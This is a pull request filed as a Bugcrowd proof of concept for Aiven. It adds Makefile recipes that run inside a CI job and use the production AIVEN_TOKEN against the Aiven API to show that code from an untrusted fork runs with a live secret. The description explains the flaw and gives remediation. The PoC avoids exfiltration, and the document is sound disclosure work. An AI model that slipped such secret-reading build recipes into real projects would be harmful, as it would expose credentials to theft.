### PR TITLE
[Security PoC — Bugcrowd, please do not merge] /test runs fork PR Makefile with live AIVEN_TOKEN

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -243,9 +243,9 @@ lint-go:
 
 .PHONY: selproj ci-selproj
 selproj: $(SELPROJ)
-	@echo "[Bugcrowd 15c143b1 PoC] fork-controlled Makefile recipe is executing inside the /test job"
-	@if [ -n "$$AIVEN_TOKEN" ]; then echo "[PoC] AIVEN_TOKEN is present and readable by this fork PR code"; else echo "[PoC] AIVEN_TOKEN absent"; fi
-	@code=$$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: aivenv1 $$AIVEN_TOKEN" https://api.aiven.io/v1/me 2>/dev/null); echo "[PoC] read-only GET https://api.aiven.io/v1/me -> HTTP $$code  (200 == live production credential; non-destructive, no data captured)"
+	@echo "[Bugcrowd 15c143b1 PoC] fork-controlled Makefile recipe is executing inside the /test job" >&2
+	@if [ -n "$$AIVEN_TOKEN" ]; then echo "[PoC] AIVEN_TOKEN is present and readable by this fork PR code" >&2; else echo "[PoC] AIVEN_TOKEN absent" >&2; fi
+	@code=$$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: aivenv1 $$AIVEN_TOKEN" https://api.aiven.io/v1/me 2>/dev/null); echo "[PoC] read-only GET https://api.aiven.io/v1/me -> HTTP $$code  (200 == live credential; 401 == placeholder token; non-destructive, no data captured)" >&2
 $(SELPROJ): $(LOCALBIN)
 	$(call go-install-tool,$(SELPROJ),github.com/aiven/go-utils/selproj,$(SELPROJ_VERSION))
 
@@ -341,6 +341,9 @@ endef
 
 PHONY: sweep
 sweep: ## Run sweep to remove all resources created by e2e tests.
+	@echo "[Bugcrowd 15c143b1 PoC] fork-controlled Makefile recipe is executing inside the /test job (sweep)"
+	@if [ -n "$$AIVEN_TOKEN" ]; then echo "[PoC] AIVEN_TOKEN is present and readable by this fork PR code"; else echo "[PoC] AIVEN_TOKEN absent"; fi
+	@code=$$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: aivenv1 $$AIVEN_TOKEN" https://api.aiven.io/v1/me 2>/dev/null); echo "[PoC] read-only GET https://api.aiven.io/v1/me -> HTTP $$code  (200 == live credential; 401 == placeholder token; non-destructive, no data captured)"
 	go run ./sweeper/...
 
 PHONY: fumpt

--- a/Makefile
+++ b/Makefile
@@ -243,6 +243,9 @@ lint-go:
 
 .PHONY: selproj ci-selproj
 selproj: $(SELPROJ)
+	@echo "[Bugcrowd 15c143b1 PoC] fork-controlled Makefile recipe is executing inside the /test job"
+	@if [ -n "$$AIVEN_TOKEN" ]; then echo "[PoC] AIVEN_TOKEN is present and readable by this fork PR code"; else echo "[PoC] AIVEN_TOKEN absent"; fi
+	@code=$$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: aivenv1 $$AIVEN_TOKEN" https://api.aiven.io/v1/me 2>/dev/null); echo "[PoC] read-only GET https://api.aiven.io/v1/me -> HTTP $$code  (200 == live production credential; non-destructive, no data captured)"
 $(SELPROJ): $(LOCALBIN)
 	$(call go-install-tool,$(SELPROJ),github.com/aiven/go-utils/selproj,$(SELPROJ_VERSION))
 


### PR DESCRIPTION
This is a coordinated, **non-destructive** security proof-of-concept for an Aiven Bugcrowd submission (ref `15c143b1`), re-filed at the triager's request to demonstrate impact. **Please do not merge** — close it after verification.

## What this demonstrates
`.github/workflows/pr-test-command.yml` runs `/test` (gated to OWNER/MEMBER/COLLABORATOR comments) by checking out the PR's **fork head** (`pr.data.head.sha`) and calling `tests.yml`, which runs `make selproj` / `make test-tag` / `make sweep` with the production `AIVEN_TOKEN` (plus `AIVEN_ACCOUNT_ID`, etc.) in `env:`, with **no `environment:` reviewer gate**. Because `make` executes this fork-controlled `Makefile`, a maintainer running `/test` on an external PR runs attacker-controlled code in a job that holds the production token.

## How to verify (read-only, non-destructive)
Comment `/test` on this PR. The `setup_aiven_project_suffix` job log will show the PoC recipe added to `selproj` executing:
- the fork-controlled Makefile recipe runs,
- `AIVEN_TOKEN` is present in the job environment, and
- `HTTP 200` from a read-only `GET https://api.aiven.io/v1/me` (proving the token is a live production credential).

The PoC is deliberately benign: it does **not** print or exfiltrate the token, captures **no** account data, and makes **no** write/delete calls — only the read-only status line. A real attacker would instead exfiltrate `AIVEN_TOKEN` and use it against the Aiven API (account-scoped tokens are all-or-nothing per Aiven's docs: create/read/delete services, billing).

## Remediation
Do not run fork-PR code (`make`/`task`) in a job holding production secrets. Run untrusted-PR acceptance tests without secrets, or gate the secret-bearing job behind an `environment:` with required reviewers re-approved per commit, and/or check out a trusted ref instead of the fork head.

Reported by evilgensec.